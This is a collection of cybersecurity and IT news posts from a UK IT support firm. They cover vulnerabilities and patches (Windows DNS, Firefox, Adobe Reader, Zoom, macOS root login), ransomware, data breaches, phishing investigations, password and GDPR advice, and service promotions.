You can learn more about their mission on their website here: https://www.techsouthwest.co.uk/

For IT expertise and support, please contact our team today.

July 14th: as Microsoft flag a ‘Critical’ Level-10 DNS vulnerability on Domain Name System (DNS) servers worldwide, Lineal engineers rush to patch the infrastructure of dozens of organisations overnight.

The Microsoft Security Response Center recently released details of CVE-2020-135, a ‘Critical Remote Code Execution’ weakness deemed ‘wormable’ (potentially spreading between devices automatically) affecting all Windows Server versions.

A grade of 10.0 is the highest possible severity level that can be assigned under the Common Vulnerability Scoring System Calculator. For comparison the WannaCry attack, which temporarily crippled the NHS in 2017, had a CVSS rating of 8.5.

Lineal staff use remote monitoring software to administer large numbers of client servers and devices, monitor hardware health and deploy patches more rapidly – and were quickly on the case overnight to patch the vulnerability as a special emergency.

Within 8 hours we’d patched a large number of DNS servers – applying both an initial fix and further scheduled updates.

DNS is a naming technology which translates the identities of computers, servers and other networked devices into the IP addresses used for connecting on private and public IT networks.

For this reason, DNS servers often have massive reach, and must be carefully protected to mitigate the risk of compromising an organisation’s technology on a huge scale – even across the globe.

Israeli IT security firm Checkpoint Software Technologies, who discovered the 17-year old hidden bug and reported it to Microsoft, argue ‘this is not just another vulnerability’ and risks handing an attacker ‘complete control of your IT’ if IT admins fail to address the issue urgently.

For IT expertise and support, please contact our team today.

UK mobile networks have been instructed not to buy Huawei 5G equipment for their infrastructure by the Government, and must remove all existing Huawei equipment by 2027.

The landmark ruling came following an overturning of last year’s half-way decision to ban Huawei from the ‘Core’ UK network only – decided as a result of the UK National Cyber Security Centre’s 2019 findings that due to US sanctions affecting Google Android products, any Huawei chip manufacture removed from (Japanese-owned and UK-based) ARM could ‘increase the risk’ to the UK.

But Government MPs, the US and Australian Governments, and even some China-critical Human Rights Groups, argued the ruling did not go far enough – resulting in today’s announcement of a complete ban.

Huawei itself argues the criticism is a politically-motivated attack by Washington to hit the Chinese economy. The tech company is the World’s biggest provider of this kind of technology, as well as one of China’s most successful exporters.

China itself has undoubtedly faced more scrutiny from the international community in recent months, following news stories about the Chinese Government’s handling of Coronavirus, Hong Kong protests, the detention of Uighur Muslims in ‘reeducation’ camps, and the close connections between Huawei and the Chinese Communist Party.

All four of the UK’s big mobile providers (BT EE, Vodafone, Three and O2) all use Huawei equipment in their core networks, albeit to different extents. The decision also affects major broadband infrastructure providers, such as BT Openreach, and related ISPs.

In practice, this means 5G providers will be forced to look at alternatives from either Finnish-provider Nokia or Swedish provider Ericsson.

For IT expertise and support, please contact our team today.

Cybersecurity experts are warning against a prevalent new strain of macOS ransomware for Apple devices dubbed ‘EvilQuest’ – packaged alongside pirated versions of popular apps.

Like most ransomware, EvilQuest encrypts all the Apple user’s files and demands a $50 ransom for decryption within 72 hours.

While many Mac users believe malware for Apple devices does not exist – this is simply untrue. The newest strain comes after similar infections spreading between Mac users in recent years, including KeRanger and Patcher.

EvilQuest is also a more sophisticated effort than most attempts by cybercriminals: the app is correctly code signed, with a very convincing installer, and even overpowers the Mac versions of common antivirus softwares such as Norton, Kaspersky, Avast, McAffee and Bullguard.

The trojanised software known to be used to deliver EvilQuest to unsuspecting victims are torrent download versions of popular Apple macOS apps, examples of which include Little Snitch, Ableton Live and Mixed in Key 8 – a popular DJ software.

Among the important steps Mac users should take to reduce the risk of macOS ransomware are:

• Keep a regular, organised regime of backups, offline and air-gapped from the device itself.
• Only download Apps from reputable sources.
• Consider whether utilities like Malwarebytes and RansomWhere are needed as extra precautions.

For IT Support and cybersecurity expertise, please contact our team today.

Popular short-haul airline easyJet has been hit by a cyber attack, affecting around nine million customers.

In a statement, easyJet says that a “highly sophisticated cyber-attack” discovered in January 2020 compromised email addresses and travel details of roughly nine million travellers. For 2,208 customers, credit card information was also accessed.

No further detail has yet been publicised as to the nature of the breach, although the company stated that it had “closed off unauthorised access”.

The bad news comes at a difficult time for airlines, as air-travel has declined dramatically in the wake of Covid-19 restrictions. When faced with a similar situation in 2018, British Airways received a large financial penalty of £183m from the Information Commissioner’s Office.

The airline are making contact with all affected customers warning extra vigilance towards ‘unsolicited communications’, due to the heightened risk of phishing attempts from criminals masquerading as easyJet who may have gained access to customers’ personal details.

Under new GDPR guidelines introduced in 2019, it is mandatory that breached organisations report to the UK Information Commissioner’s Office (ICO), who are currently investigating.

For cybersecurity and IT Support expertise, please contact Lineal today.

The UK National Cyber Security Centre (NCSC) are officially removing the technical terms ‘Whitelist’ and ‘Blacklist’ from their organisation in an effort to be more inclusive.

The terms ‘Whitelist’ and ‘Blacklist’, which refer to lists of permitted and not-permitted things in the cybersecurity world, will be replaced with the more literal and accurate ‘Allow List’ and ‘Deny List’.

Prolific spam email domains for example are often ‘Blacklisted’ by system administrators – a negative association the NCSC feels should not, even inadvertently, imply a connection to skin colour.

The organisation, a more public extension of GCHQ, acknowledged in a statement on their website that whilst “…it’s not the biggest issue in the world…”, the organisation is acting positively in response to requests from the public, is making an effort to be more inclusive, and that using such terms might otherwise have impaired the recruitment of valued “future colleagues.”

‘Blacklisting’ also has an unfortunate connotation with an illegal practice of barring whistle-blowing employees and trade union members from working across certain sectors, which has a history within the construction industry among others.

Google Chrome, Microsoft Edge and others have made similar terminology decisions – deciding that pejorative references to colour should not be used in cybersecurity terminology.

For IT Support and cybersecurity expertise, please contact Lineal today.

The volume of Covid-19 scams and phishing emails has increased dramatically in recent weeks according to cybersecurity authorities.

Email security software and cybersecurity provider Barracuda Networks has reported a 667% increase in phishing emails throughout the pandemic.

Common scams include pretending to represent Government, law enforcement or medical authorities to obtain information or financial payment, blackmailing users with threat of infection, donation requests for fake organisations, and malware distribution – including one new ransomware even dubbed ‘Coronavirus.’

Via Barracuda: Source 

In a joint statement published in April, the UK National Crime Cyber Security Centre and US CISA (Dept. of Homeland Security) notes the sudden rise in Covid-19 scams, and even highlight instances of SMS text-messaging phishing attempts mimicking UK Government text alerts.

In the example cited, a fake compensation payment is offered to entice the user to hand over details via an imitation UK Government website.

There has also been a growth in online hackers and trolls targeting Zoom and other video conferencing platforms. Users unfamiliar with this kind of software in particular may prove an easy target for cyber criminals.

Phishing scams are part of a larger trend of online Covid-19 themed fraud. In March, the NCSC removed around 500 fake online shops claiming to be selling fraudulent virus-related items over the internet.

Google currently estimate that Gmail filtering is blocking over 100 million phishing emails each day, and that almost 20% of online email scams now refer to Coronavirus (around 18 million) – likely to be the largest phishing ‘theme’ in history.

For cybersecurity expertise and assistance, please contact Lineal today.

Mozilla have released an urgent patch to version 74.0 of Firefox, notifying browser users around the world that it’s time to patch Firefox again.

The timing of the new patch, which also affects the ‘Extended Support Release’ (version 68.6) suggests that the latest update fixes a vulnerability which (at worst) may have been live in the browser since July 2019.

Mozilla’s official announcement from 3rd April categorises the impact as ‘Critical’, and states that ‘we are are of targeted attacks in the wild abusing this flaw’.

The precise details of the security flaw have not yet been published, although we know that the issue refers to a ‘use-after-free’ function by which the browser frees up previously occupied memory back to the device – with online cybersecurity blogs speculating that any new contents of the relinquished memory may still have some level of access to the browser.

Community-led Mozilla, whose popular Firefox browser is still the World’s second-most popular desktop browser, suffered other critical security flaws as recently as January – when the US Department of Homeland security took the unusual step of instructing users to urgently update their browsers following the discovery of a vulnerability which granted potential access to the operating system.

Not that Mozzilla are unique in such issues: Google also faced embarrassment in recent months after rolling out an experimental change to Chrome which left millions of users unable to load new tabs.

Patch your browser regularly: Firefox users can update to version 74.0.1 via:

• To upgrade on PC, open Firefox and click ‘About’ and select ‘Restart and Update Firefox.’
• To upgrade on Mac, open Firefox and click ‘Options’, ‘Firefox Updates or Options’, ‘Advanced’, ‘Update to update Firefox.’

The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency have advised all Mozilla Firefox users to urgently update their browser versions, following discovery of a vulnerability that grants potential access to the operating system.

The unusual warning comes after Mozilla itself admitted being aware of ‘targeted attacks in the wild abusing this flaw.’

Security loopholes in major platforms are usually closed before criminals are able to exploit them on mass, but this latest admission raises the ‘security advisory’ notice to ‘critical’ status.

Users should upgrade their browser to at least version 72.0.1 on PC/Mac – mobile versions are thought to be unaffected.

• To upgrade on PC, open Firefox and click ‘About’ and select ‘Restart and Update Firefox.’
• To upgrade on Mac, open Firefox and click ‘Options’, ‘Firefox Updates or Options’, ‘Advanced’, ‘Update to update Firefox.’

Discovered by Chinese security company Qihoo 360 just two days following the release of Firefox’s previous update, the US Government ‘encourages users and administrators…. To apply the necessary updates.’

For IT Support and cybersecurity expertise, please contact Lineal today.

Google Chrome 79 will contain a Chrome hacked password alarm to notify at-risk users.

‘Password Checker’, which first appeared in October, will regularly compare user passwords saved in-browser against publicly-known data breaches.

The service will feel familiar to those who’ve tried the (often terrifying) but essential https://haveibeenpwned.com/ – which shows visitors where their email addresses have been compromised.

Chrome’s update is being gradually rolled out to new users, and is available within Settings > People > Sync and Google Services > Other Google Services, and is named ‘Warn you if passwords are exposed in a data breach.’

The alert mechanism is just the latest in a series of attempts to push users to safer browsing: 2019 also saw Google Chrome actively warn users of websites without valid security certificate, and penalise such websites in Google search rankings.

Chrome 79’s new hacked password alarm mechanism should prompt systematically when account credentials need password updates, and allow users to keep their accounts secure.

For IT support and cybersecurity expertise, contact Lineal today.

How secure is your password?… One of the biggest reasons for security breaches is weak passwords.  People often choose passwords that are too short.  Regardless of how tedious it seems, make it a point to update your passwords regularly; use upper and lower case letters along with symbols and numbers.

The key measurement of password security is entropy. This, in computer science terms, is a measurement of how unpredictable a password is, based on how long it would take an attacker to work it out by making a guess at each character.  As a standard, longer passwords are by definition more secure and harder to crack.  In the table below you can see how shorter/easier passwords, are quicker to crack.

What should a password look like

Strong, secure passwords have a lot in common; they are usually long, unique, random and involve a mixture of lowercase and uppercase letters as well as special characters and numbers.  Trying to create passwords that comprised of all of these aspects, can sometimes be challenging.

Most insecure passwords are the result of our human behaviour. People do a lot of very predictable things and in general find it difficult to be random, especially when they are actively trying to be.  For instance putting special characters only at the beginning or end rather than mixing them up in the middle, or using common phrases and keyboard patterns.  So that we can remember we often try to use memorable pieces of information but we should always, where possible, avoid clues and references to our personal lives.

Where can I go for advice

There are many articles online to help assist with what a strong password looks like.  At a recent event Lineal ran with the South West Police Regional Cyber Crime Unit, which focused on cyber security, password strength was highlighted as a high risk for many businesses and individuals.

To find out more, or if you require any help with ways to help protect your business, please contact the IT support team at Lineal.

Local businesses recently gathered at Barnstaple Library for a special cybersecurity workshop organised by the South West Police Regional Cyber Crime Unit and Lineal Software Solutions Ltd.

Thirty participants from firms across the South West took part in a series of lego-based group exercises highlighting key concepts in cybersecurity, as they sought to protect a fictional utilities company from attack by common real-world cyber crime.

The winning team defended their company by spending their budget on the correct countermeasures at each stage of the exercise, and strategically limiting the damage from any breaches in security.

The South West Regional Organised Crime Unit (SW ROCU) is one of nine regional units across England and Wales that delivers specialist capabilities to target and disrupt serious and organised crime. Designed to raise awareness of coordinated digital threats, the cybersecurity workshop session is part of a new educational initiative being run by the Police right across the region.

Group exercises were followed by a short Q&A including advice for businesses on related topics including network best-practice, password policy, physical security, and the Government’s new Cyber Essentials certification.

Lineal’s Head of Technical Services, Matt Norris, explained: “We were to delighted to be able to organise the Cyber Crime Unit to run this very special workshop for local companies: we see cyber attacks becoming ever more sophisticated, and the SWRCCU takes a really positive and constructive approach to educating business owners about how to protect their organisations and employees.”

“Many businesses struggle to grapple with cybersecurity, but help and expertise is accessible.”

You can learn more about the South West Police Regional Cyber Crime Unit’s and their educational work across the South West online here.

For IT support and cybersecurity expertise, please contact Lineal today.

Apple have officially announced their expected launch event for the iPhone 11, for Tuesday 10th September 2019.

The invite, issued ‘By Innovation Only’ doesn’t give much away about what we can expect to see, although Apple devotees have noted the similarity between the glassy colouring of the teased Apple logo and the original Apple Emac’s famous colourful style from the early 2000s.

Rumours circulating online suggest Apple may be planning multiple iPhone 11 models – with square multi-lens camera clusters and glassy coloured casings, photos of the materials or which were leaked online in May.

Remaining releases are likely to be mainly iterative, including iOS 13 for iPhone, iPadOS and even WatchOS 6. MacOS 10.15 Catalina is also expected to be a key part of Apple’s showcase.

The tech giant is likely to see the iPhone 11 announcement as a chance to help reverse hardware sales trends – which Apple now curiously no longer publishes in full, asserting that devices sold is ‘less relevant today than it was in the past’ a likely marker of the iPhone market slowing down as consumers hang on to their devices for a longer replacement cycle.

Apple is also expected to launch it’s own gaming service, dubbed Apple Arcade, as an online subscription service akin to an iTunes for gaming – just one example of how the company is increasingly re-focusing its efforts on premium service offerings, rather than luxury hardware.

For Apple hardware, expertise, accessories and support – please contact our team today.

Reports of the death of the password may have been greatly exaggerated in the media: from the suggestion that passwords are the ‘weakest link’ in the cybersecurity chain, to the notion that humans are so bad at using them, that it’s time the technology industry saved us from ourselves.

But is it true; are passwords doomed? Enter the FIDO2 Project – a fascinating effort to ‘Move the World Beyond Passwords’ led by the FIDO Alliance industry association and World Wide Web Consortium.

Headlines aside, FIDO2’s aims are ambitious: to replace passwords with a flexible device-based authentication standard that allows users to log in via biometrics or temporary security keys.

Unique to each website, not stored centrally and not transmitted, FIDO2 argue this standard naturally scuppers phishing, password theft and replay attacks – and introduces some privacy advantages sure to woo even ardent digital rights activists: such as the inability to track users between sites.

While still technically possible, cheating biometrics requires the kind of preparation not common to everyday opportunistic cyber-criminals.

The big players are taking note: Google plans to ‘begin’ retiring passwords for Google services accessed via biometric enabled smartphones (such as those with fingerprint scanners) and Microsoft is planning similar changes to apps in Windows 10; even talking of a ‘passwordless world‘ via Windows Hello that extends facial recognition. Apple have been publicly heading down this road for a while now – with ‘FaceID’ facial recognition introduced for recent generations of iPhone and iPad, as well as Apple Watch device-led unlocking for your Mac.

Apple’s efforts to prove that the iPhone stores only a ‘mathematical representation’ of the user’s face also suggests that they’re preparing to defend a policy of extending FaceID further at the expense of passwords, even in an increasingly privacy-conscious World.

Users may of course find the a world without passwords a little disorientating to begin with – although not forever, if the replacement technology proves more convenient.

Password keeper apps (such as the excellent 1Password) have become an interesting half-way house to a more secure password future – where the password manager retains a set of passwords behind a strong keycode, in an encrypted form. The password manager may also perform other useful functions, such as warning the user where passwords overlap, allocating different password access permissions to different people within a business or organisation, or auto-filling in common web browsers.

The adoption of password managers may reflect a coming time where users continue to ‘use’ passwords, but without engaging in the process of recalling or typing the password. It may not be passwords that are doomed, but the user’s traditional interaction with passwords.

Are passwords doomed? A few potential futures emerge: one where passwords exist but are used less directly by users, where passwords are relegated to a secondary security measure of questionable usefulness, or most radically, where passwords are replaced entirely.

For cybersecurity and IT expertise, please contact our team today.

Apple have issued a silent update for video conferencing software Zoom, following discovery of a major webcam security vulnerability affecting Mac users.

Zoom issued an emergency patch for the problem two days ago – in a rapid response Apple was still concerned might not reach enough users.

The controversial web server installation – originally designed to save Mac-based Safari web browser users from additional clicks and make video conferencing easier to use, was shown to create a potentially serious vulnerability whereby Zoom calls could be launched from any website with the camera turned on.

In bizarre scenes, technology journalists researching the problem were even paired up in video conferences with other unknown individuals doing the same.

Believed to put at risk more than 4 million webcams globally, the zero-day exploit was discovered by security researcher Jonathan Leitschuh – who originally gave Zoom 90-days to resolve the issue prior to publication.

Leitschuh has since praised Zoom’s willingness to do a public ‘about face’ with the emergency patch, and Zoom’s CEO taking direct video calls to discuss the problem.

Nevertheless, Apple’s decision to step in to protect Mac users remains an embarrassment for the previously very successful video conferencing solution.

Additional problems include Mac versions of video conferencing software which use Zoom’s underlying services for white-labeled video calling – such as Ringcentral.

Instead of patching the problem, Zoom’s permission to turn on the webcam can also be disabled manually, via Settings > Video > ‘Turn Off My Video When Joining a Meeting.’

For software expertise and support, please contact Lineal today.

Bitdefender have released a free decryption tool rescuing those affected by recent versions of GandCrab ransomware.

The free tool enables stricken users to recover data encrypted by various versions of GandCrab without paying a ransom to cybercriminals.

In a joint announcement with Europol, Romanian Police and other law-enforcement agencies, the cybersecurity provider detailed how a team of experts were recently able to gain access to the GandCrab control server, and access decryption keys for the ransomware that would allow safe recovery of data.

Blackhat developers behind GandCrab have claimed to have exploited more than $2 billion in ransom payments worldwide, and appeared to have enjoyed mocking the cybersecurity industry’s attempts to bring them to justice.

GandCrab became the latest nasty ransomware threat in January 2018 – following a disturbing trend of businesses and organisations worldwide struck by malicious encryption software.

Bitdefender’s previous attempts to quash the ransomware resulted in new versions being released by cyber criminals, but the latest recovery of private keys resulted in GandCrab’s developers announcing their ‘retirement’ – allegedly having exploited more than $150m in personal profit over five major versions of the ransomware.

Bitdefender’s recovery tool and instructions for use is available for download from the Bitdefender Labs here. In order to use the tool successfully, affected users must have a working internet connection and at least one copy of the ‘ransom note’ file present on the affected device.

For cybersecurity expertise and support, contact our team today.

Adobe have released an urgent update for Adobe Reader DC, patching newly discovered security vulnerabilities.

The highly popular PDF app, often pre-installed on Windows PCs, has been shown to contain a loophole that allows an attacker to remotely run Javascript code within an opened PDF to cause memory corruption.

Currently rated ‘Critical’ by Adobe’s Severity Rating System, the bug is believed to have originated from entirely legitimate functionality: Adobe Reader allows PDFs to contain embedded JavaScript to support interactions with the web.

Adobe have responded quickly – publishing the fix to Adobe Security Bulletin alongside patching for 42 other vulnerabilities as of Wednesday 12th February, including one which allowed PDF documents to access hashed passwords.

Adobe Reader is officially 25 years old this year, and although official figures are hard to source, is popularly believed to dominate more than 75% of the PDF software market.

Users can either auto-update their installation or prompt this manually by clicking ‘Help’ > ‘Check for Updates’ within the software itself.

For software and security expertise, contact Lineal today.

Be honest, you’ve read some truly useless things online about GDPR. We all have.

The problem isn’t one of enthusiasm: more and more companies are recognising the impending deadline of the new data protection regulations and acting to implement best practice.

There is, of course, a growing industry of consulting firms and data protection advisers trading on businesses’ lack of expertise and frequently, fear of being left behind. Most organisations begin preparing with a spot of Googling, some light reading, and a bit of browsing online GDPR help articles written by experts.

However, the real experts can’t divulge too much free advice (otherwise why contract their services?) thus much of the available articles and blog posts are deliberately vague. The conundrum has already spawned some unfortunate attempts at humour, but doesn’t really help companies attempting to put in place GDPR compliant policy.

All is not lost: there really is some genuinely useful  guidance out there – here are our pick for some of the best GDPR resources:

ICO: Eight Practical Steps

The Information Commissioner’s Office original ‘eight practical steps’ presentation is a series of slides that are exceptionally clear, and can be worked through in stages. A more recent, formal ’12-step’ version also exists, for a more conceptual understanding of the new regulations.

GDPR Readiness Assessment from Microsoft

A little technical at times, this quick quiz is a useful way of thinking further about protection policy, particularly around access control. For further information on how Microsoft can assist with GDPR in the cloud, look for the blue button in the top right hand corner.

ICO Helpline

The ICO has a little known helpline via which small businesses and charities can consult a member of ICO staff for extra advice – details of which can be found above.

IT Governance Compliance Gap Assessment Tool

Always a strong source of IT expertise and policy, IT Governance have developed a range of ‘Toolkits’ to assist data protection officers and those implementing GDPR within their organisations. These range from the simple £60 compliance gap assessment tool (a handy Excel Spreadsheet you can work through) to more expensive implementation packs and data flow mapping tools.

Apple have issued a fix for yesterday’s severe security alert, after it emerged the tech giant’s High Sierra operating system would allow access to many users’ MacOS Root User without entering a password.

The story caused alarm around the world, as Mac users discovered full administrator control of their device was available to anyone within reach of the keyboard.

Discovered by a Turkish developer who tweeted it to Apple Support, Lemi Ergin, the widely publicised fault is believed to affect all Apple MacOS devices (such as the iMac and MacBook ranges) running version 10.13.1 or newer.

Mr Ergin has since published an article on Medium defending his decision to flag the vulnerability publicly, arguing that despite the security flaw being public knowledge on the Apple Developer Forum since 13th November, Apple had failed for resolve the issue.

Yesterday Lineal published guidance to all our Mac clients, advising caution over the physical security of Apple hardware, and explaining the need for users to set a new root password to temporarily secure their Mac while Apple worked on a security fix.

Security update 2017-001 is now available via the App Store, and Apple have even taken the almost unprecedented step of forcing 10.13.1 devices to update automatically.

The failure to set a random default MacOS root password (a fundamental technical security feature) once again calls into question the recent competence of Apple’s historically excellent quality control and product testing, and may slow the adoption of the firm’s latest flagship operating system. The widespread media publicity surrounding the story is also likely to undermine Apple’s long-held reputation for security on Mac devices.

Apple issued an apology, stating ‘We greatly regret this error and apologise to all Mac users.”

For Apple assistance and support, contact Lineal’s IT team today.

Fake hardware has been seized by a City of London Police intellectual property crimes unit, following a recent raid in Kent.

The counterfeit networking equipment, worth at least £300,000, is believed to have been manufactured by organised criminals imitating the high-quality hardware of IT giant Cisco.

Small form-factor pluggable transceivers were recovered, which are used to convert optical data to conventional electrical signals as part of fibre-optic networks. 

Police believe the risks of organised criminal gangs being caught transporting imitation IT hardware are lower than for drugs or firearms, and that only technically-trained specialists would be able to distinguish counterfeit technology from the real thing.

Although no evidence of cyber-security intrusions have so far been found, engineers from Cisco stressed that small items like these could easily find their way into a business or public-sector supply chain, become mixed up with genuine network hardware, or fail due to low-quality manufacture.

Customers who suspect they may have encountered counterfeit items should isolate the hardware in question from other devices and report their suspicions to IT staff.

Lineal are a Cisco Select Partner – for hardware advice and support, please contact our team today: 01271 375999

In a surprise move, Eugene Kaspersky has publicly offered to give the US Government access to the source code of its security software in a bid for transparency.

The offer is the latest development in an ongoing dance between the Russian IT security company and the US Government, after the Senate Armed Services Committee threatened to ‘blacklist’ the software company from applying for US defence contracts over the risk of influence from the Russian Government.

In a sensationalist piece released by Bloomberg, journalists claim the Moscow-based firm hold regular meetings with Russian Ministry of Defence and FSB agents, and that Eugene Kaspersky has even personally met with Russian intelligence officials in a ‘banya’ sauna.

Modern business anti-virus software typically collect invaluable background data to reinforce a real-time intelligence war against the latest security threats on the internet – with many users not being aware of whether their antivirus understands the latest threats.

Kaspersky argues the headlines are part of a ‘witch-hunt’ by Washington; industry analysts have acknowledged the heightened scrutiny of Kaspersky by US authorities has closely followed their recent uncovering of NSA ‘Equation’ hacking tools as a part of work against recent ransomware outbreaks, but may also represent the beginnings of a smear campaign by domestic US security providers.

Speaking to the Associated Press, the security provider implied it had already rejected government requests to undertake offensive cyberattacks rather than defensive software development – not necessarily requested by the Russian government.

Against the background of press-interest in alleged Russian hacking stories, it appears the dramatic feud has some distance left to run.

For IT security advice and expertise – contact Lineal’s team today.

Around 6% of PCs are estimated to still be running out of date, unsupported operating systems like Microsoft Windows XP. Here at Lineal we’ve long advocated keeping operating systems up-to-date and secure against the latest threats.

But in certain circumstances that’s not always so easy: legacy XP machines are often connected to third party equipment (e.g.: manufacturing hardware) using cable connections or drivers that are now difficult to obtain. The external hardware can’t be replaced as readily as the connected PC for both cost and practical reasons, so the ageing PC (with a lack of XP antivirus) creates an in-built security vulnerability for a businesses’ whole network.

Users caught by this conundrum can find a solution in Bitdefender’s Security for XP and Vista – a version of Bitdefender’s award-winning security built to be backwards compatible to older PCs, and providing ongoing security against the latest threats for legacy hardware.

Security for XP and Vista is available for Windows XP Service Pack 3 and Vista Service Pack 2 operating systems, and also integrates with older software likely to be found on such machines, such as Outlook 2007, Yahoo Messenger 9, Internet Explorer 8 and other common web browsers of the same generation.

For those concerned that a trusty old machine and lack of XP antivirus could be the very weakest point in their security, Bitdefender could be a shrewd choice indeed.

For IT Security advice and support, contact Lineal today.

Lineal Software have been certified as a Bitdefender Partner for Bitdefender security software.

Bitdefender’s range of security products are used on millions of devices worldwide and the provider ranks highly in independent Virus Bulleton’s VB100 tests, as well as winning numerous quality awards for software innovation.

A wide variety of both Bitdefender Home and Business security products are available, across platforms including Windows, Mac and Android and more.

Lineal’s Head of Technical Services Matt Norris explained: ‘We’re very pleased to qualify as Bronze Bitdefender partners – this qualification only expands the range of IT security options which Lineal can offer to our customers and we look forward to delivering a high quality service for those interested in using Bitdefender.’

‘There are only a handful of Bitdefender partners in the South West, and Lineal are delighted to be one of them.’

For IT security advice and support, contact Lineal today.

Continuing our recent series on email phishing trickery including fake invoices and Apple ID theft, this week we discovered a new scam involving a fake communication claiming to be from the Driver & Vehicle Licensing Agency (DVLA).

You haven’t sent them your vehicle details: but never fear, enter them below and avoid a hefty ‘1000 GBP’ fine. Never mind that your garage should have organised a V5 document for you, just click the link and type in your details. This couldn’t be a scam? Right?

We set Lineal’s security trainee Lewis on the fake DVLA emails case – who found that the email links to a private (non Gov.uk) web-page with a extensive bit of PHP code running in the background. A classic Trojan, this webpage invited you to download your casefile – and likely something dangerous along with it.

Despite poor grammar, the format matched a GOV.UK page quite closely and the ‘official’ nature of the styling might easily have tricked unsuspecting motorists.

Avoiding the page itself, Lewis completed an HTTPS lookup on the domain hosting the fake web page – but found two servers running the same scam. The email itself appeared to be routed via the USA, in an effort to mask the attacker(s) identity.

Tracing both IPs seperately led back to the same address in Germany, registered under two different names which could either be part of an organisation (or more likely) both assumed identities stolen from others fallen victim to the scam.

German privacy law prevents Google StreetView from being completed across most of the country, so an aerial view of an unknown industrial building on the outskirts of Lippstadt was a close as we could get to sourcing the suspicious email itself.

Clearly a sophisticated operation, fake DVLA emails like this highlight the growing technical ability of online scammers and the need for solid IT security precautions.

For IT Security advice and support, contact Lineal today: 01271 375999

Here at Lineal we check a lot of suspicious emails – containing everything from fake invoices, dodgy downloads and even new ‘Zero-day’ ransomware threats not yet seen elsewhere on the internet. Cyber-security is a rapidly developing battlefield.

Last week our security trainee from Petroc, Lewis, received a fairly typical ‘Phishing’ email – designed to look like an official request for information in order to trick recipients into handing over personal details. Keyboard at the ready, he decided to go on an investigation – hunting down email scammers.

‘Your Apple ID has been suspended’ read the headline, but never fear, you can reset your account by typing in your private details via ‘Appl.e.com’. It may sound like an obvious scam, but the written quality of the email was high, and Verizon estimates that more than 25% of Phishing emails are not only opened, but clicked on by unsuspecting victims.

The email link itself looked suspicious so Lewis stripped the exact page link back to it’s original domain as our first clue. A quick HTTP lookup found the IP address of a Linux based Server with several open ports.

The scammers themselves were careful – expanding the email header shows an encrypted code in place of an email reference.

Online tools like GeoTool suggested the server sending the email had been French (although mapping this an imprecise science – suggesting the Parisian machine was sat at the bottom of the river Seine.) Nevertheless this gave us a country of origin and also a more accurate address.

Here we hit a problem: the address listed related to a French cloud hosting provider’s company office building in Roubaix, near the city of Lille on the border between France and Belgium. The company itself appears entirely legitimate, so it’s likely a server there has been hijacked or otherwise used inappropriately by a customer of the provider.

A reverse DNS lookup via an online US Security tool suggested the hosted domain name’s registered contact person was based in an apartment building in district 56121, Thessaloniki, Greece, and even listed a gmail address and phone number for the named contact (redacted.)

Had we wanted to, there’s an opportunity here for mischief, but here we decided to end our search – with sufficiently detailed information to report to customer services of the French hosting provider whose server had been misused to distribute the email.

Although it’s likely the original source had been found, it’s possible the Greek client registering the domain name was themselves a victim of the Phishing email or a similar scam.

As a case study, Lewis’ virtual chase across Europe hunting down email scammers highlights how every business is at risk from a globalised world of threats – anyone can be struck by a dangerous email from anywhere, and even the most local businesses need to take precautions.

For IT Security advice and support – contact Lineal today.

2017

With data security making national news headlines, 2017 is only likely to put increasing pressure on businesses of all sizes to take sensible precautions.

But with IT moving so fast, what innovations are likely to lead the way through 2017? Exactly what sensible precautions will most tech-savvy companies be taking?

Cloud is good…

The worldwide push for ever more cloud-based systems appears to be unstoppable. A recent report from Synergy Research Group has suggested the global market for cloud computing grew by 25% to September 2016, reaching a staggering $148 billion in value.

It’s hard to see this not continuing, with companies relying on the convenience and automation of stashing growing quantities off-site backups in the cloud – using services like Office 365 as their private vault. As we’ve covered before: holding assets like email in the cloud actually gives you better protection than most people’s private server.

…..But Hybrid Cloud is better still.

But 2017’s smartest will be looking further ahead to Hybrid Cloud systems. As IT Pro recently noted, many companies report using more than 5 backup systems, but have no planning for speed of recovery should that data actually be needed urgently during 2017.

Getting all that data back may present a problem if your organisation is large, meaning hybrid on-site/cloud services like Lineal’s Disaster Recovery Service are likely to become the most flexible middle option. Keeping both a synchronised backup on-site, and a copy with a relatively local cloud service, leaves even the most vulnerable business with the maximum number of options.

Change your passwords

If you don’t already change passwords regularly, the security benefits cannot be overstated. Stolen data can often be circulated on the internet many times, so changing passwords regularly keeps not only your business secure, but helps prevent repeat data theft from being profitable. 

Whilst everyone still has a ‘New Year’ mindset and are prepared to accept a little change, it’s worth updating those passwords company wide. Remember to use a variety of different characters and choose something only you would ever guess.

Have a 2017 Plan A…. and a Plan B

Ransomware increasingly appears to be the organised criminal world’s cyber-weapon of choice and shows no sign of abating; expect to see more big UK high-street names get compromised this year by malicious emails. 

Antivirus companies may include ever more sophisticated heuristics to intercept malicious downloads before they begin encrypting your files, but ultimately only safe backups will ensure you can always restore to a clean set of data. Every firm should have a ‘Plan B’ for how to carry this out.

It’s all about Recovery Time

Expect to see Disaster Recovery (not just back-up and contingency) become a by-word for preparedness, with companies and organisations in every sector being judged not just by their number of backups, but by their costly hours of down-time. 

So if nothing else, start 2017 with an old piece of technology: a pen and paper. Work out what your business’ data recovery plan actually is, and how long it will take –  should the very worst happen.

Lineal can provide a range of IT security and business continuity solutions: contact our team today.

UK data centres –

Microsoft’s Office 365 Team have announced the availability of multiple UK data centres for customer data.

The move follows increasingly strict rules on data compliance in the financial, security, health and public sectors – with more cloud IT users looking to ensure their data remains safely located in the UK.

Prospective customers considering the implications of Office 365 are able to view the locations of Microsoft’s uk data centres with this online ‘Where Is My Data?’ map, which now displays both the additional data centres and the Microsoft cloud services they support, in both London and Durham, with a third site anticipated for Cardiff.

Office365 and Azure Users will also have the ability to ‘re-locate’ their data from regional data centres (in most cases based within mainland Europe) to the new UK service.

In addition to the security and legal advantages for protecting sensitive data, cloud users of Office 365 are likely to benefit from lower costs, online backups and collaborative, remote access to files.

For now, the ability to re-locate Office365 or Azure data to the UK is likely to be restricted, with priority expected to be given to high-profile UK public sector customers including NHS Trusts and the Ministry of Defence – the latter mirroring many customers belated move to the cloud, upgrading legacy on-site systems in use since 2005.

The new infrastructure has been widely praised, with Microsoft clearly investing heavily in addressing the doubts many have about moving their IT to the cloud; reducing Office365 downtime to just 4 hours per year, and now re-locating data within country of origin for compliance with a high standard of data protection.

Contact Lineal for advice on moving to the cloud, or for a free trial of Microsoft Office 365 Business Premium, click here.

smartphone security

